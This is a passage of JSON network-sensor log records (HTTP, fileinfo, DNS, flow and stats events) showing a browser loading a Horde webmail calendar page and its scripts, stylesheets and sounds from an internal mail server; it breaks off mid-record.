{"timestamp":"2020-02-29T00:26:19.656142+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47024,"tx_id":0}} {"timestamp":"2020-02-29T00:26:19.667468+0000","flow_id":1218721392308044,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44728,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32226,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:19.775983+0000","flow_id":1218721392308044,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44728,"proto":"UDP","dns":{"type":"answer","id":32226,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:19.775983+0000","flow_id":1218721392308044,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44728,"proto":"UDP","dns":{"type":"answer","id":32226,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:19.913180+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24491}} {"timestamp":"2020-02-29T00:26:19.955751+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24491},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:26:19.958220+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451}} {"timestamp":"2020-02-29T00:26:19.961103+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470}} {"timestamp":"2020-02-29T00:26:19.966016+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":10823,"tx_id":2}} {"timestamp":"2020-02-29T00:26:19.968061+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499}} {"timestamp":"2020-02-29T00:26:19.969853+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499},"app_proto":"http","fileinfo":{"filename":"\/js\/keynavlist.js","state":"CLOSED","stored":false,"size":8737,"tx_id":3}} {"timestamp":"2020-02-29T00:26:19.971829+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778}} {"timestamp":"2020-02-29T00:26:19.973668+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778},"app_proto":"http","fileinfo":{"filename":"\/js\/autocomplete.js","state":"CLOSED","stored":false,"size":9648,"tx_id":4}} {"timestamp":"2020-02-29T00:26:19.974070+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403}} {"timestamp":"2020-02-29T00:26:19.976662+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403},"app_proto":"http","fileinfo":{"filename":"\/js\/liquidmetal.js","state":"CLOSED","stored":false,"size":3834,"tx_id":5}} {"timestamp":"2020-02-29T00:26:19.978233+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046}} {"timestamp":"2020-02-29T00:26:19.987537+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046},"app_proto":"http","fileinfo":{"filename":"\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":10406,"tx_id":6}} {"timestamp":"2020-02-29T00:26:19.998674+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:26:20.000847+0000","event_type":"stats","stats":{"uptime":15232,"capture":{"kernel_packets":141740,"kernel_drops":0},"decoder":{"pkts":141750,"bytes":97361929,"invalid":195,"ipv4":140159,"ipv6":10,"ethernet":141750,"raw":0,"null":0,"sll":0,"tcp":134579,"udp":5370,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086976},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2910,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2926,"synack":2917,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1917,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2456,"failed_udp":116},"tx":{"http":4976,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2540}},"flow_mgr":{"closed_pruned":2888,"new_pruned":17,"est_pruned":2544,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":2,"flows_timeout":4,"flows_timeout_inuse":4,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":86812,"memcap":0}}} {"timestamp":"2020-02-29T00:26:20.001315+0000","flow_id":1303568466127980,"event_type":"flow","src_ip":"192.168.10.130","src_port":34286,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":35,"pkts_toclient":61,"bytes_toserver":3699,"bytes_toclient":80638,"start":"2020-02-29T00:25:01.732268+0000","end":"2020-02-29T00:25:06.784171+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.001608+0000","flow_id":331982439825668,"event_type":"flow","src_ip":"192.168.10.130","src_port":34300,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1292,"bytes_toclient":719,"start":"2020-02-29T00:25:09.704772+0000","end":"2020-02-29T00:25:15.702759+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.001680+0000","flow_id":922484608450970,"event_type":"flow","src_ip":"192.168.10.130","src_port":34302,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":2110,"bytes_toclient":1988,"start":"2020-02-29T00:25:09.704922+0000","end":"2020-02-29T00:25:16.392611+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.001745+0000","flow_id":1539237617182180,"event_type":"flow","src_ip":"192.168.10.130","src_port":34296,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":2151,"bytes_toclient":3711,"start":"2020-02-29T00:25:09.697828+0000","end":"2020-02-29T00:25:14.727346+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.000326+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":17678,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.000682+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275}} {"timestamp":"2020-02-29T00:26:20.005962+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/imple.js","state":"CLOSED","stored":false,"size":1359,"tx_id":7}} {"timestamp":"2020-02-29T00:26:20.007455+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376}} {"timestamp":"2020-02-29T00:26:20.008209+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275},"app_proto":"http","fileinfo":{"filename":"\/js\/redbox.js","state":"CLOSED","stored":false,"size":4234,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.008619+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401}} {"timestamp":"2020-02-29T00:26:20.011114+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401},"app_proto":"http","fileinfo":{"filename":"\/js\/colorpicker.js","state":"CLOSED","stored":false,"size":12973,"tx_id":2}} {"timestamp":"2020-02-29T00:26:20.011607+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744}} {"timestamp":"2020-02-29T00:26:20.011912+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517}} {"timestamp":"2020-02-29T00:26:20.013306+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517},"app_proto":"http","fileinfo":{"filename":"\/js\/calendar.js","state":"CLOSED","stored":false,"size":10335,"tx_id":3}} {"timestamp":"2020-02-29T00:26:20.013612+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566}} {"timestamp":"2020-02-29T00:26:20.029529+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":24731,"tx_id":8}} {"timestamp":"2020-02-29T00:26:20.031054+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":27623},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/kronolith.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":9}} {"timestamp":"2020-02-29T00:26:20.036805+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":50590}} {"timestamp":"2020-02-29T00:26:20.039089+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566},"app_proto":"http","fileinfo":{"filename":"\/js\/form_ghost.js","state":"CLOSED","stored":false,"size":4231,"tx_id":4}} {"timestamp":"2020-02-29T00:26:20.039474+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168}} {"timestamp":"2020-02-29T00:26:20.040435+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/doorbell.wav","state":"CLOSED","stored":false,"size":5168,"tx_id":5}} {"timestamp":"2020-02-29T00:26:20.040949+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688}} {"timestamp":"2020-02-29T00:26:20.042181+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363}} {"timestamp":"2020-02-29T00:26:20.043293+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/gnid3.wav","state":"CLOSED","stored":false,"size":13688,"tx_id":6}} {"timestamp":"2020-02-29T00:26:20.043781+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 